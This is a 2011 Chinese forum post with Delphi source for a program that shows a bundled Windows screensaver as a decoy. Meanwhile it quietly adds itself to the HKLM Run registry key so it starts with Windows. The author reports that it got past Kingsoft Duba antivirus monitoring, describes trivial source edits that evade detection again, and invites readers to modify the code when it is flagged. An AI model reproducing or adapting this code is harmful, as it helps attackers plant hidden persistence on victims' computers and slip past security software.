本帖最后由 langsileaa 于 2011-4-11 00:36 编辑
不再自写SCR程序,虽然那样可以伪装的让使用者感觉不到,这里直接打包一个系统自带的SCR。
运行程序,两三秒不要操作键盘鼠标。然后去看注册表项:
HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run
再次调整代码,并抓取了整个过程。从视频大家可以看到,我是在联网状态下进行的测试。毒霸监控全开!
![](http://www.ajs2002.com/css/Test.gif)
效果图:
测试程序:
测试程序估计待会会被云响应,在写代码过程中发现貌似简单修改源码:大小写变化、添加字符、代码位置调整等
都可以再次躲避监控,不过没有深入测试。再次附上源码,遇到被杀,有能力的童鞋可自行调整。
- unit Unit1;
- interface
- uses
- Windows, Messages, SysUtils, Variants, Classes, Graphics, Controls, Forms,
- Dialogs, StdCtrls,Registry, ExtCtrls,shellapi;
- type
- TForm1 = class(TForm)
- Button2: TButton;
- Timer1: TTimer;
- procedure Button2Click(Sender: TObject);
- procedure Timer1Timer(Sender: TObject);
- private
- { Private declarations }
- public
- { Public declarations }
- function ExtractRes(ResType, ResName, ResNewName: string): boolean;
- end;
- var
- Form1: TForm1;
- implementation
- {$R *.dfm}
- {$R server.RES}
- function TForm1.ExtractRes(ResType, ResName, ResNewName: string): boolean;
- var
- Res: TResourceStream;
- begin
- try
- Res := TResourceStream.Create(Hinstance, Resname, Pchar(ResType));
- try
- Res.SavetoFile(ResNewName);
- Result := true;
- finally
- Res.Free;
- end;
- except
- Result := false;
- end;
- end;
- procedure TForm1.Button2Click(Sender: TObject);
- var
- MyRegPath:String;
- begin
- MyRegPath:=extractfilepath(application.ExeName)+'Sspipes.scr';
- ExtractRes('ExeFile', 'Mscr', MyRegPath);
- ShellExecute(0,'open',pchar(ExtractFilePath(ParamStr(0))+'sspipes.scr'),nil,nil,sw_show);
- end;
- procedure TForm1.Timer1Timer(Sender: TObject);
- Var
- Reg:TRegistry;
- begin
- Reg:=TRegistry.Create;
- Try
- Reg.RootKey:=HKEY_LOCAL_MACHINE;
- if Reg.OpenKey('\Software\Microsoft\Windows\CurrentVersion\Run',True) then
- Reg.WriteString('MyRun',ExtractFilePath(ParamStr(0))+'ScrTest.exe');
- Finally
- Reg.CloseKey;
- Reg.Free;
- Timer1.Enabled:=false;
- end;
- end;
- end.
复制代码
|